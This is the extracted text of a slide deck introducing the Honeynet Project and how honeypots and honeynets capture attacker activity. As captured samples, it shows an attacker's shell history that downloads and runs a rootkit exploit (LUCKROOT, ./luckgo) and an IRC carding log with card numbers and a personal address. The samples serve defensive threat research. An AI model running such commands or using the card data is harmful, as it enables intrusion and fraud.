Title: Honeynets and The Honeynet Project
1Honeynets and The Honeynet Project
- List name, affiliations, and involvement with the
- To explain the Honeynet Project, what we have
learned, and what honeynets are.
- The Project and Research Alliance
- Examples of Research
- How Honeynets Work
- Learning More
5Honeynet Project
- How can we defend against an enemy, when we dont
even know who the enemy is?
7One Possible Solution
- To learn the tools, tactics, and motives of
the blackhat community, and share the lessons
8Honeynet Project
- Volunteer organization of security professionals.
- Open Source, share all of our research and
findings. - Deploy networks around the world to be hacked.
- Everything we capture is happening in the wild.
- We have no agenda, no employees, nor anything to
- Awareness To raise awareness of the threats that
exist. - Information For those already aware, to teach
and inform about the threats. - Research To give organizations the capabilities
to learn more on their own.
10Project Organization
- Non-profit (501c3) organization
- Board of Directors
- No more then two members from any organization.
- Funded by the community, including the NIC.
- Diverse set of skills and experiences.
- Team works virtually, from around the world.
11Honeynet Research Alliance
- Starting in 2002, the Alliance is a forum of
organizations around the world actively
researching, sharing and deploying Honeynet
technologies. - http//www.honeynet.org/alliance/
12Alliance Members
- South Florida Honeynet Project
- Georgia Technical Institute
- Azusa Pacific University
- Paladion Networks Honeynet Project (India)
- Internet Systematics Lab Honeynet Project
(Greece) - Mexico Honeynet (Mexico)
- Honeynet.BR (Brazil)
- Irish Honeynet
- Norwegian Honeynet
- UK Honeynet
- French Honeynet Project
- Italian Honeynet Project
- German Honeynet Project
- Spanish Honeynet Project
- Singapore Honeynet Project
13Examples of Research
14What we have captured
- The Honeynet Project has captured primarily
external threats that focus on targets of
opportunity. - Little has yet to be captured on advanced
threats, few honeynets to date have been designed
to capture them.
15The Threat
- Hundreds of scans a day.
- Fastest time honeypot manually compromised, 15
minutes (worm, under 60 seconds). - Life expectancies vulnerable Win32 system is
under three hours, vulnerable Linux system is
three months. - Primarily cyber-crime, focused on Win32 platforms
and their users. - Attackers can control thousands, if not hundreds
of thousands of systems. - Only getting worse, because the crime pays and
becoming highly organized.
16Who am I?
17That Was Then
Jan 8 184812 HISTORY PID1246 UID0 lynx
www.becys.org/LUCKROOT.TAR Jan 8 184831
HISTORY PID1246 UID0 y Jan 8 184845 HISTORY
PID1246 UID0 tar -xvfz LUCKROOT.TAR Jan 8
184859 HISTORY PID1246 UID0 tar -xzvf Lu Jan
8 184901 HISTORY PID1246 UID0 tar -xzvf
L Jan 8 184903 HISTORY PID1246 UID0 tar
-xzvf LUCKROOT.TAR Jan 8 184906 HISTORY
PID1246 UID0 cd luckroot Jan 8 184913
HISTORY PID1246 UID0 ./luckgo 216 210 Jan 8
185107 HISTORY PID1246 UID0 ./luckgo 200
120 Jan 8 185143 HISTORY PID1246 UID0
./luckgo 64 120 Jan 8 185200 HISTORY PID1246
UID0 ./luckgo 216 200
18This is Now
19DDoS for Money
J4ck why don't you start charging for packet
attacks? J4ck "give me x amount and I'll take
bla bla offline for this amount of
time J1LL it was illegal last I checked J4ck
heh, then everything you do is illegal. Why not
make money off of it? J4ck I know plenty of
people that'd pay exorbatent amounts for
20Credit Cards Exchanging
045516 COCO_JAA !cc 045523 Chk 0,19(0
COCO_JAA 9)0 CC for U 4,1 Bob JohnsP. O.
Box 126Wendel, CA 25631United
States510-863-48844407070000588951 06/05
(All This ccs update everyday From My Hacked
shopping Database - You must regular come here
for got all this ccs) 8 9(11 TraDecS Chk_Bot
FoR goldcard9) 045542 COCO_JAA !cclimit
4407070000588951 045546 Chk 0,19(0 COCO_JAA
9)0 Limit for Ur MasterCard (5407070000788951)
0.881 (This Doesn't Mean Its Valid) 4 0(11
TraDecS Chk_bot FoR channel) 045655 COCO_JAA
!cardablesite 045722 COCO_JAA !cardable
electronics 045727 Chk 0,19(0 COCO_JAA 9)0
Site where you can card electronics 9(11
TraDecS Chk_bot FoR goldcard9) 045809
COCO_JAA !cclimit 4234294391131136 045812
Chk 0,19(0 COCO_JAA 9)0 Limit for Ur Visa
(4264294291131136) 9.697 (This Doesn't Mean
Its Valid) 4 0(11 TraDecS Chk_bot FoR channel)
21How Honeynets Work
- A honeypot is an information system resource
whose value lies in unauthorized or illicit use
of that resource. - Has no production value, anything going to or
from a honeypot is likely a probe, attack or
compromise. - Primary value to most organizations is
information. -
- Collect small data sets of high value.
- Reduce false positives
- Catch new attacks, false negatives
- Work in encrypted or IPv6 environments
- Simple concept requiring minimal resources.
- Limited field of view (microscope)
- Risk (mainly high-interaction honeypots)
- Low-interaction
- Emulates services, applications, and OSs.
- Low risk and easy to deploy/maintain, but capture
limited information. - High-interaction
- Real services, applications, and OSs
- Capture extensive information, but high risk and
time intensive to maintain.
26Examples of Honeypots
Low Interaction
- BackOfficer Friendly
- KFSensor
- Honeyd
- Honeynets
High Interaction
- High-interaction honeypot designed to capture
in-depth information. - Information has different value to different
organizations. - Its an architecture you populate with live
systems, not a product or software. - Any traffic entering or leaving is suspect.
28How it works
- A highly controlled network where every packet
entering or leaving is monitored, captured, and
analyzed. - Data Control
- Data Capture
29Honeynet - GenII
30No Data Control
31Data Control
32(No Transcript)
33Data Capture - Sebek
- Hidden kernel module that captures all activity
- Dumps activity to the network.
- Attacker cannot sniff any traffic based on magic
number and dst port.
34(No Transcript)
35Bootable CDROM
36Distributed Capabilities
- Require extensive resources to properly maintain.
- Detection and anti-honeynet technologies have
been introduced. - Can be used to attack or harm other non-Honeynet
systems. - Privacy can be a potential issue.
38Legal Contact for .mil / .gov
- Department of Justice Computer Crime and
Intellectual Property Section. - Paul Ohm
- Number (202) 514.1026
- E-Mail paul.ohm_at_usdoj.gov
39Learning More
- The opportunity to study real attacks on your
own, compare your analysis with others, and learn
about blackhats. - Scan of the Month challenges
- Forensic Challenge
- Reverse Challenge
- http//www.honeynet.org/misc/
41Know Your Enemy papers
- Series of papers dedicated to honeynet research
and their findings. - Translated into over 10 different languages.
- http//www.honeynet.org/papers/
42Know Your Enemy 2nd Edition
Advanced Network Management Lab
44How to contribute
- Volunteer!
- Honeywall CDROM Subscription
- PayPal Donation
- Buy our Book
- Funding
ltproject_at_honeynet.orggt http//www.honeynet.org/fun
- The Honeynet Project is a non-profit, volunteer
organization researching cyber threats using
honeynet technologies, and sharing those lessons
learned. - It is hoped our research can improve the
awareness and security of the Internet community.
46- http//www.honeynet.org
- ltproject_at_honeynet.orggt